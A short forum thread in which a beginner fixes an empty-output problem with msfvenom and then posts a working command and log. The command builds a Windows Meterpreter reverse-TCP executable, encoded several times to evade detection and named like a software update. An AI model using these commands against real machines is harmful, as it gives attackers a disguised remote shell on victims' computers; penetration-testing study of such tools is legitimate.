Msfvenom Problem: Empty File

Hey guys,

so I just started using metasploit, but i have the following problem: everytime I use msfvenom to generate a .exe file the following happens:

I type something like:

msfvenom -p windows/meterpreter/reversetcp -e x86/shikataganai -i 5 LHOST=<local IP> LPORT=1337 -f exe > upgrade.exe

the output is the following:

msf > msfvenom -p windows/meterpreter/reversetcp -e x86/shikata-ga-nai -i 5 LHOST=10.0.0.10 LPORT=1337 -f exe > upgrade.exe

* exec: msfvenom -p windows/meterpreter/reversetcp -e x86/shikata-ga-nai -i 5 LHOST=10.0.0.10 LPORT=1337 -f exe > upgrade.exe

The upgrade.exe file is empty.
Database is connected.
and I have no idea what to do...

Hopefully you can help me!

Greetings,
S.

EDIT: - = underscore

2 Responses

From the looks of it you're running this command inside of the msfconsole. You could try running the same command outside of the msfconsole in a regular terminal.

-Defalt

Hey Defalt,

thank you very much for your help! the output now looks like:

root@kali:~# msfvenom -p windows/meterpreter/reversetcp -e x86/shikataganai -i 5 LHOST=10.0.0.3 LPORT=1337 -f exe > /root/Dokumente/updatehax.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikataganai
x86/shikata
ganai succeeded with size 326 (iteration=0)
x86/shikata
ganai succeeded with size 353 (iteration=1)
x86/shikata
ganai succeeded with size 380 (iteration=2)
x86/shikata
ganai succeeded with size 407 (iteration=3)
x86/shikata
ganai succeeded with size 434 (iteration=4)
x86/shikata
ganai chosen with final size 434
Payload size: 434 bytes

so i think it should work, i will test it later on :)

Thank you very very much :)

Share Your Thoughts

  • Hot
  • Active